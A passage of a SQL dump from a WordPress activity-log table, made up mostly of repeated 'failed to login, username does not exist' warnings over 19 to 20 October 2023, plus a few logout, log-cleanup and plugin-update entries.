exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38960,'2023-10-19 16:06:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38961,'2023-10-19 16:16:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38962,'2023-10-19 16:17:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38963,'2023-10-19 16:19:16','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(38964,'2023-10-19 16:27:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38965,'2023-10-19 16:28:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38966,'2023-10-19 16:29:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38967,'2023-10-19 16:38:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38968,'2023-10-19 16:40:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38969,'2023-10-19 16:48:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38970,'2023-10-19 16:49:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38971,'2023-10-19 16:51:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38972,'2023-10-19 17:00:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38973,'2023-10-19 17:03:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38974,'2023-10-19 17:10:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38975,'2023-10-19 17:14:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38976,'2023-10-19 17:21:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38977,'2023-10-19 17:25:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38978,'2023-10-19 17:32:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38979,'2023-10-19 17:37:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38980,'2023-10-19 17:43:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38981,'2023-10-19 17:48:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38982,'2023-10-19 17:54:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38983,'2023-10-19 18:00:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38984,'2023-10-19 18:04:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38985,'2023-10-19 18:11:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38986,'2023-10-19 18:15:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38987,'2023-10-19 18:23:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38988,'2023-10-19 18:26:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38989,'2023-10-19 18:34:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38990,'2023-10-19 18:37:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38991,'2023-10-19 18:46:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38992,'2023-10-19 18:47:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38993,'2023-10-19 18:48:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38994,'2023-10-19 18:57:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38995,'2023-10-19 18:59:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38996,'2023-10-19 19:08:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38997,'2023-10-19 19:10:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38998,'2023-10-19 19:20:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38999,'2023-10-19 19:21:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39000,'2023-10-19 19:31:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39001,'2023-10-19 19:32:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39002,'2023-10-19 19:43:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39003,'2023-10-19 19:43:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39004,'2023-10-19 19:54:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39005,'2023-10-19 19:54:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39006,'2023-10-19 20:05:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39007,'2023-10-19 20:05:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39008,'2023-10-19 20:16:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39009,'2023-10-19 20:17:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39010,'2023-10-19 20:27:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39011,'2023-10-19 20:28:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39012,'2023-10-19 20:38:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39013,'2023-10-19 20:39:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39014,'2023-10-19 20:49:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39015,'2023-10-19 20:50:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39016,'2023-10-19 21:00:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39017,'2023-10-19 21:02:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39018,'2023-10-19 21:11:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39019,'2023-10-19 21:13:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39020,'2023-10-19 21:22:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39021,'2023-10-19 21:24:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39022,'2023-10-19 21:30:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39023,'2023-10-19 21:34:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39024,'2023-10-19 21:36:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39025,'2023-10-19 21:45:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39026,'2023-10-19 21:47:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39027,'2023-10-19 21:56:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39028,'2023-10-19 21:58:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39029,'2023-10-19 22:07:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39030,'2023-10-19 22:10:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39031,'2023-10-19 22:18:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39032,'2023-10-19 22:21:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39033,'2023-10-19 22:29:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39034,'2023-10-19 22:32:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39035,'2023-10-19 22:40:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39036,'2023-10-19 22:44:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39037,'2023-10-19 22:52:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39038,'2023-10-19 22:55:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39039,'2023-10-19 23:03:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39040,'2023-10-19 23:07:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39041,'2023-10-19 23:14:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39042,'2023-10-19 23:18:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39043,'2023-10-19 23:25:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39044,'2023-10-19 23:29:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39045,'2023-10-19 23:37:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39046,'2023-10-19 23:41:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39047,'2023-10-19 23:48:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39048,'2023-10-19 23:52:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39049,'2023-10-19 23:59:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39050,'2023-10-20 00:04:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39051,'2023-10-20 00:10:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39052,'2023-10-20 00:16:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39053,'2023-10-20 00:22:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39054,'2023-10-20 00:27:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39055,'2023-10-20 00:33:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39056,'2023-10-20 00:39:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39057,'2023-10-20 00:44:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39058,'2023-10-20 00:50:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39059,'2023-10-20 00:56:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39060,'2023-10-20 01:01:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39061,'2023-10-20 01:07:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39062,'2023-10-20 01:13:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39063,'2023-10-20 01:18:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39064,'2023-10-20 01:24:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39065,'2023-10-20 01:29:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39066,'2023-10-20 01:36:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39067,'2023-10-20 01:41:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39068,'2023-10-20 01:47:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39069,'2023-10-20 01:53:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39070,'2023-10-20 01:59:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39071,'2023-10-20 02:03:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39072,'2023-10-20 02:04:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39073,'2023-10-20 02:05:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39074,'2023-10-20 02:10:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39075,'2023-10-20 02:15:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39076,'2023-10-20 02:22:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39077,'2023-10-20 02:27:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39078,'2023-10-20 02:33:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39079,'2023-10-20 02:38:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39080,'2023-10-20 02:45:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39081,'2023-10-20 02:49:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39082,'2023-10-20 02:56:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39083,'2023-10-20 03:01:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39084,'2023-10-20 03:08:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39085,'2023-10-20 03:12:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39086,'2023-10-20 03:19:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39087,'2023-10-20 03:23:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39088,'2023-10-20 03:31:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39089,'2023-10-20 03:34:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39090,'2023-10-20 03:39:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39091,'2023-10-20 03:42:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39092,'2023-10-20 03:45:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39093,'2023-10-20 03:53:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39094,'2023-10-20 03:56:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39095,'2023-10-20 04:05:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39096,'2023-10-20 04:08:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39097,'2023-10-20 04:17:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39098,'2023-10-20 04:19:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39099,'2023-10-20 04:28:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39100,'2023-10-20 04:30:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39101,'2023-10-20 04:39:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39102,'2023-10-20 04:41:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39103,'2023-10-20 04:51:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39104,'2023-10-20 04:52:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39105,'2023-10-20 05:00:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39106,'2023-10-20 05:02:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39107,'2023-10-20 05:03:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39108,'2023-10-20 05:13:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39109,'2023-10-20 05:15:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39110,'2023-10-20 05:25:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39111,'2023-10-20 05:26:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39112,'2023-10-20 05:36:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39113,'2023-10-20 05:37:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39114,'2023-10-20 05:47:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39115,'2023-10-20 05:48:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39116,'2023-10-20 05:54:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39117,'2023-10-20 05:58:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39118,'2023-10-20 05:59:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39119,'2023-10-20 05:59:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39120,'2023-10-20 06:10:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39121,'2023-10-20 06:10:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39122,'2023-10-20 06:21:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39123,'2023-10-20 06:22:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39124,'2023-10-20 06:33:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39125,'2023-10-20 06:33:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39126,'2023-10-20 06:44:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39127,'2023-10-20 06:44:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39128,'2023-10-20 06:55:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39129,'2023-10-20 07:07:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39130,'2023-10-20 07:18:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39131,'2023-10-20 07:30:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39132,'2023-10-20 07:41:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35159,'2023-09-24 16:07:04','SimpleHistoryLogger','info','Removed {num_rows} events that were older than {days} days','ff880941e34ea06e52ba41846ba1ebd9','wp'),(35160,'2023-09-24 23:11:07','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(35161,'2023-09-25 02:40:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35162,'2023-09-25 12:19:07','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','98936a6e28d51903c28b31cf52d88933','wp'),(35163,'2023-09-25 16:25:09','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','1d7ace8ac14b3b8ecd4f997bc84261b2','wp'),(35164,'2023-09-25 16:31:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not 